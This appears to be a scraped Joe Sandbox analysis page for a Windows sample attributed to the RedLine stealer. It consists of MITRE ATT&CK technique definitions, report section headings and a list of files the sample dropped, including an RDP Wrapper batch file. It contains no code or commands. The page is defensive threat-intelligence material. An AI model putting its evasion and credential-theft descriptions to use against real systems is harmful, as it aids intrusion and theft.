Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are many user accounts on a given system or if they want to hide their administrative or other management accounts from other users.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, User Account: User Account Creation, User Account: User Account Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 8lOT1rXZp5.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: RedLine

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\RDP Wrapper\rdpwrap.bat

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0bcb01k2.pw2.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1x31hsdd.b5t.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3jf3ybkt.buf.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4iu4lnqe.npy.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_apvlpguy.exv.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_feyzinzl.xj2.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_huoofykt.n4l.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hzbspvtp.mzc.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jtcx5apn.sgc.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_krloq1ir.npr.psm1

Windows Analysis Report
8lOT1rXZp5.exe

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre